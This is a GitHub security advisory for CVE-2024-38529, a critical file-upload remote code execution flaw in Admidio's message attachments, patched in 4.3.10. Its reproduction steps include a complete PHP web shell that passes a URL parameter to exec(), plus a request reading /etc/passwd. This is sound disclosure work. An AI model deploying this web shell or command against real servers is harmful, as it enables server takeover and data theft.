ghsa-g872-jwwr-vggm
Vulnerability from github
Published
2024-07-29 16:32
Modified
2024-07-29 16:32
Severity ?
9.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
9.3 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
9.3 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
VLAI Severity ?
Summary
Admidio Vulnerable to RCE via Arbitrary File Upload in Message Attachment
Details
Description:
Remote Code Execution Vulnerability has been identified in the Message module of the Admidio Application, where it is possible to upload a PHP file in the attachment. The uploaded file can be accessed publicly through the URL {admidio_base_url}/adm_my_files/messages_attachments/{file_name}.
The vulnerability is caused due to the lack of file extension verification, allowing malicious files to be uploaded to the server and public availability of the uploaded file.
An attacker can upload a PHP web shell that executes OS commands on the server, compromising the application server.
Note: I am using the docker-compose.yaml file from https://github.com/Admidio/admidio/blob/master/README-Docker.md#docker-compose-usage official documentation.
Impact:
An attacker can exploit this flaw to upload a PHP web shell, which can be used to execute arbitrary commands on the server. This can lead to a complete compromise of the application server, allowing the attacker to:
- Execute arbitrary code or commands.
- Access, modify, or delete sensitive data.
- Install malicious software or scripts.
- Gain further access to internal networks.
- Disrupt services and applications hosted on the server.
Recommendation:
- Implement strict file extension verification to ensure that only allowed file types (e.g., images, documents) can be uploaded.
- Reject any file upload with disallowed or suspicious extensions such as .php, .phtml, .exe, etc.
Steps to Reproduce:
- As a member user, go to write an email message.
- Upload a PHP file in the Attachment, containing the following content: ```
';
echo implode("\n", $output);
echo '';
?>
``
3. Send the email.
4. In the message history go to the sent message.
5. Download the file, to get the uploaded file name.
6. Go to the following URL:{admidio_base_url}/adm_my_files/messages_attachments/{file_name}?command=cat+/etc/passwd`
7. The server's passwd file would be returned in the response.
Proof Of Concept:
Figure 1: Code of messages_send.php, not having file extension verification.
Figure 2: Uploading Webshell as attachment.
Figure 3: Download the uploaded file to get the uploaded file name.
Figure 4: Uploaded File name.
Figure 5: RCE via web shell.
Figure 6: RCE via Webshell.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "admidio/admidio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.3.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-38529"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-29T16:32:32Z",
"nvd_published_at": "2024-07-29T15:15:10Z",
"severity": "CRITICAL"
},
"details": "### Description:\nRemote Code Execution Vulnerability has been identified in the Message module of the Admidio Application, where it is possible to upload a PHP file in the attachment. The uploaded file can be accessed publicly through the URL `{admidio_base_url}/adm_my_files/messages_attachments/{file_name}`.\n\nThe vulnerability is caused due to the lack of file extension verification, allowing malicious files to be uploaded to the server and public availability of the uploaded file.\n\nAn attacker can upload a PHP web shell that executes OS commands on the server, compromising the application server.\n\nNote: I am using the docker-compose.yaml file from https://github.com/Admidio/admidio/blob/master/README-Docker.md#docker-compose-usage official documentation.\n\n### Impact:\nAn attacker can exploit this flaw to upload a PHP web shell, which can be used to execute arbitrary commands on the server. This can lead to a complete compromise of the application server, allowing the attacker to:\n\n- Execute arbitrary code or commands.\n- Access, modify, or delete sensitive data.\n- Install malicious software or scripts.\n- Gain further access to internal networks.\n- Disrupt services and applications hosted on the server.\n\n### Recommendation:\n\n- Implement strict file extension verification to ensure that only allowed file types (e.g., images, documents) can be uploaded.\n- Reject any file upload with disallowed or suspicious extensions such as .php, .phtml, .exe, etc.\n\n### Steps to Reproduce:\n1. As a member user, go to write an email message.\n2. Upload a PHP file in the Attachment, containing the following content:\n```\n\u003c?php\n$command = isset($_GET[\u0027command\u0027]) ? $_GET[\u0027command\u0027] : \u0027\u0027;\n$output = [];\n$return_var = 0;\nexec($command, $output, $return_var);\necho \u0027\u003ch1\u003eExploiting RCE\u003c/h1\u003e\u0027;\necho \u0027Command: \u0027.$command;\necho \u0027\\n\u003cpre\u003e\u0027;\necho implode(\"\\n\", $output);\necho \u0027\u003c/pre\u003e\u0027;\n?\u003e\n```\n3. Send the email.\n4. In the message history go to the sent message.\n5. Download the file, to get the uploaded file name.\n6. Go to the following URL: \n`{admidio_base_url}/adm_my_files/messages_attachments/{file_name}?command=cat+/etc/passwd`\n7. The server\u0027s passwd file would be returned in the response.\n\n### Proof Of Concept:\n\n\n\n_Figure 1: Code of messages_send.php, not having file extension verification._\n\n\n\n_Figure 2: Uploading Webshell as attachment._\n\n\n\n_Figure 3: Download the uploaded file to get the uploaded file name._\n\n\n\n_Figure 4: Uploaded File name._\n\n\n\n_Figure 5: RCE via web shell._\n\n\n\n_Figure 6: RCE via Webshell._",
"id": "GHSA-g872-jwwr-vggm",
"modified": "2024-07-29T16:32:32Z",
"published": "2024-07-29T16:32:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-g872-jwwr-vggm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38529"
},
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/commit/3b1cc1cda05747edebe15f2825b79bc5a673d94c"
},
{
"type": "PACKAGE",
"url": "https://github.com/Admidio/admidio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Admidio Vulnerable to RCE via Arbitrary File Upload in Message Attachment"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…